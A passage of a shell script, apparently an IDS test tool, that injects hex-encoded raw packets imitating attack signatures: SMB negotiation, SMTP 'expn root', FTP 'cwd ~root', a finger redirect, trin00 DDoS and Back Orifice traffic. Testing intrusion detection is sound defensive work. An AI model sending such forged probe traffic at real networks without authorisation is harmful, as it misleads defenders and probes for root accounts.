    a002 7d78 e066 0000 0204 05b4 0402 080a \
    00f2 a709 0000 0000 0103 0300"
}

SMBnegprot () {
  $IWU $src $dst $nb $ttl "\
    4500 00dc 24ec 4000 4006 bffa 0101 0101 \
    0202 0202 0692 008b f592 21fa 0527 1ee4 \
    8018 7d78 0b18 0000 0101 080a 00f2 e6be \
    0b68 6559 0000 00a4 ff53 4d42 7200 0000 \
    0008 0100 0000 0000 0000 0000 0000 0000 \
    0000 9e2c 0000 0100 0081 0002 5043 204e \
    4554 574f 524b 2050 524f 4752 414d 2031 \
    2e30 0002 4d49 4352 4f53 4f46 5420 4e45 \
    5457 4f52 4b53 2031 2e30 3300 024d 4943 \
    524f 534f 4654 204e 4554 574f 524b 5320 \
    332e 3000 024c 414e 4d41 4e31 2e30 0002 \
    4c4d 312e 3258 3030 3200 0253 616d 6261 \
    0002 4e54 204c 414e 4d41 4e20 312e 3000 \
    024e 5420 4c4d 2030 2e31 3200"    
}

smtp_expn_root () {
  $IWU $src $dst $nb $ttl "\
    4510 003f 251c 4000 4006 c057 0101 0101 \
    0202 0202 0694 0019 072a b42b 173b 5366 \
    8018 7d78 99e5 0000 0101 080a 00f3 b907 \
    0b69 3439 6578 706e 2072 6f6f 740d 0a"
}

finger_redirect () {
  $IWU $src $dst $nb $ttl "\
    4500 003c 2528 4000 4006 c05e 0101 0101 \
    0202 0202 0698 004f 2864 0003 0000 0000 \
    a002 7d78 242e 0000 0204 05b4 0402 080a \
    00f4 20e9 0000 0000 0103 0300"
}

ftp_cwd_root () {
  $IWU $src $dst $nb $ttl "\
    4510 0034 2555 4000 4006 c029 0101 0101 \ 
    0202 0202 069b 0015 2fd3 52d3 3f89 ef14 \
    8010 7d78 af2e 0000 0101 080a 00f4 58f8 \
    0b69 d796"
}

ftp_port () {
  $IWU $src $dst $nb $ttl "\
    4510 003f 2556 4000 4006 c01d 0101 0101 \
    0202 0202 069b 0015 2fd3 52d3 3f89 ef14 \
    8018 7d78 7771 0000 0101 080a 00f4 5d1b \
    0b69 d796 6377 6420 7e72 6f6f 740d 0a"
}

trin00_pong () {
  $IWU $src $dst $nb $ttl "\
    4500 0021 2678 0000 4011 ff1e 0101 0101 \
    0202 0202 04e1 7a67 000d 82bf 504f 4e47 \
    0a"
}

back_orifice () {
  $IWU $src $dst $nb $ttl "\
    4500 003e 2698 0000 4011 fee1 0101 0101 \
    0202 0202 04e1 7a69 002a 767a 7468 6174 \
    2773 2066 756e 2069 736e 2774 2069 7420 \
    3f20 2e2e 2e20 7361 2f68 7363 200a"
}

### Main #################
IDSwakeup
echo
### EOF ##################

